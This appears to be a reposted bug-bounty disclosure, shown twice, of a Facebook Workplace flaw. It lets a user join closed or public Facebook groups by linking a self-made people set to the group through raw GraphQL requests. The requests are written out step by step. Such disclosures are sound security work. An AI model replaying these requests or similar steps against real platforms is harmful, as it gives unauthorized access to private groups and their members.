Become member of close & public group
this bug allow attacker to add him self as member to closed &public group using workplace platform
1 Go to workplace platform :
https://work.facebook.com/work/admin/user_sets/
2- Create people set :
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:11",actor_id:actorid,name:myset-test,external_id:}}&doc_id=1801011926626947
3- Add your work id to the set created:
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:12",actor_id:actorid,member_id:[work_profile_id],scim_company_group_id:[set_id_created]}}&doc_id=1690433404336349
4- Add your work profile to normal group (group not in www.facebook.com)
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:14",actor_id:actorid,rule_id:[set_id_created],groups_ids:[normal_group]}}&doc_id=1798717653514339
* normal_group * :Is normal closed or public group in www.facebook.com (not in workplace)
-
At this point work user can get notifications about new post and other notifications
but when visit here; https://work-id.facebook.com/groups/[normal_group] they redirect to
https://www.facebook.com/groups/[normal_group] to personal profile (not member in group)
The solution : Try to add personnel user to group from work platform
Visit this link:
https://work-id.m.facebook.com/groups/members/search/?group_id=[normal_group]
You see Invite via link:
https://fb.me/g/AAAAAAAAAA
Visit link and you can join group as personnel user ( see all members ,create post )
Source(Original): Click Me
Source2: Click Me
this bug allow attacker to add him self as member to closed &public group using workplace platform
1 Go to workplace platform :
https://work.facebook.com/work/admin/user_sets/
2- Create people set :
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:11",actor_id:actorid,name:myset-test,external_id:}}&doc_id=1801011926626947
3- Add your work id to the set created:
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:12",actor_id:actorid,member_id:[work_profile_id],scim_company_group_id:[set_id_created]}}&doc_id=1690433404336349
4- Add your work profile to normal group (group not in www.facebook.com)
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:14",actor_id:actorid,rule_id:[set_id_created],groups_ids:[normal_group]}}&doc_id=1798717653514339
* normal_group * :Is normal closed or public group in www.facebook.com (not in workplace)
-
At this point work user can get notifications about new post and other notifications
but when visit here; https://work-id.facebook.com/groups/[normal_group] they redirect to
https://www.facebook.com/groups/[normal_group] to personal profile (not member in group)
The solution : Try to add personnel user to group from work platform
Visit this link:
https://work-id.m.facebook.com/groups/members/search/?group_id=[normal_group]
You see Invite via link:
https://fb.me/g/AAAAAAAAAA
Visit link and you can join group as personnel user ( see all members ,create post )
Source(Original): Click Me
Source2: Click Me
Son düzenleme: